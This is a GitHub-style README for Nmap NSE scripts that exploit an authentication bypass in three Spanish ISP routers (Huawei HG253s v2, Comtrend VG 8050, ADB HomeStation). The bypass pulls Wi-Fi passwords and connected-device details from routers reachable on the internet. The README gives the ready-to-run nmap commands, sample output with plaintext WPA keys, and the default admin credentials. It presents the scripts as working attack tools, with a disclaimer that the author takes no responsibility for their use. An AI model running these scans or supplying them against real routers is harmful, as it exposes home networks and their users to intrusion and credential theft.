Some NSE scripts to search information from routers
Switch branches/tags
Nothing to show
Clone or download

README.md

What is it?

Some NSE scripts to search information from routers.

The author of this scripts are VicenDominguez. He found the 0-Day on Huawei I only modified for two others.

The author of this script is not responsible for its use.

#Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version.

##Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet.

##Usage

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-vodafone-hua253s: 
|   SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
|   Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX

#Comtrend VG 8050 Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by DaniLabs

##Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet.

##Usage

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050: 
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP: 
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2: 
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by DaniLabs

##Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet.

Add the credentials by default are admin / 1234 ##Usage

nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation: 
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X